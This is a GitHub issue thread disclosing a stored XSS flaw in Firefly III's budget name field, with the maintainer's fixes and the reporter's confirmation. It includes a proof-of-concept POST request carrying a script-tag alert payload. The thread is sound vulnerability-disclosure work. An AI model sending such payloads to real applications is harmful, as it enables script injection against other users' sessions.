Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Stored XSS in budget name #2335

Closed
dayn1ne opened this issue Jul 15, 2019 · 7 comments

Comments

@dayn1ne
Copy link

commented Jul 15, 2019

Description
Current version of Firefly III Version 4.7.17 is vulnerable to stored XSS due to lack of filtration of user-supplied data in budget name. Malicious attacker can create specially crafted link, which contains javascript code and assign it to budget name. User who add transactions with malicious budget, can view page with that transaction on tag summary page (http://firefly.host/tags/show/$tag_number$), malicious javascript code will be executed.

Steps to reproduce
I create a small video for reproduce steps
XSS Steps.zip

PoC

POST /budgets/store HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
Cookie: firefly_session=<Your session here>;
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

_token=<Your token here>=1&name=<script>alert("XSS PoC")</script>

Screenshot 2019-07-15 at 17 18 30

@JC5

This comment has been minimized.

Copy link
Member

commented Jul 15, 2019

Thanks, nice find. I'll verify and push an update as soon as I can. You're mixing up tags and budgets by the way, is this correct?

@JC5

This comment has been minimized.

Copy link
Member

commented Jul 15, 2019

Sorry, I see what you mean.

@JC5 JC5 closed this in 45ddb64 Jul 15, 2019

@JC5

This comment has been minimized.

Copy link
Member

commented Jul 15, 2019

I have pushed 4.7.17.1 that should fix the bug and a similar one in category names. The docker builds are running now. In my haste, I completely forgot to credit you which I will do in my release post and on reddit, after you confirm the issue is gone.

I've reopened the issue as GitHub has automatically closed it.

@JC5 JC5 reopened this Jul 15, 2019

@JC5 JC5 added the bug label Jul 15, 2019

@dayn1ne

This comment has been minimized.

Copy link
Author

commented Jul 15, 2019

I have pushed 4.7.17.1 that should fix the bug and a similar one in category names. The docker builds are running now. In my haste, I completely forgot to credit you which I will do in my release post and on reddit, after you confirm the issue is gone.

I've reopened the issue as GitHub has automatically closed it.

I check commit - 45ddb64 and see only changes to versions in some files and change titles in other.

But anyway i got source code from https://github.com/firefly-iii/firefly-iii/releases/tag/4.7.17.1 and install it for checking.

Vulnerability still exist

I uploaded the video to the dropbox - (https://www.dropbox.com/s/gdr87bh4pat5ly5/xss_2.mov?dl=0)

@JC5 JC5 closed this in def3070 Jul 15, 2019

@JC5 JC5 reopened this Jul 15, 2019

@JC5

This comment has been minimized.

Copy link
Member

commented Jul 15, 2019

You're right. I am an idiot. I pushed the correct fix in 4.7.17.2. Can you confirm?

@dayn1ne

This comment has been minimized.

Copy link
Author

commented Jul 15, 2019

You're right. I am an idiot. I pushed the correct fix in 4.7.17.2. Can you confirm?

Confirm, i cannot reproduce XSS

Thank you for such quick fix and for this wonderful budget app.
I will continue search for security bugs and will inform you if found them

@JC5

This comment has been minimized.

Copy link
Member

commented Jul 15, 2019

No problem, please do. You know where to find me!

@JC5 JC5 added the fixed label Jul 15, 2019

@JC5 JC5 closed this Aug 3, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
2 participants
You can’t perform that action at this time.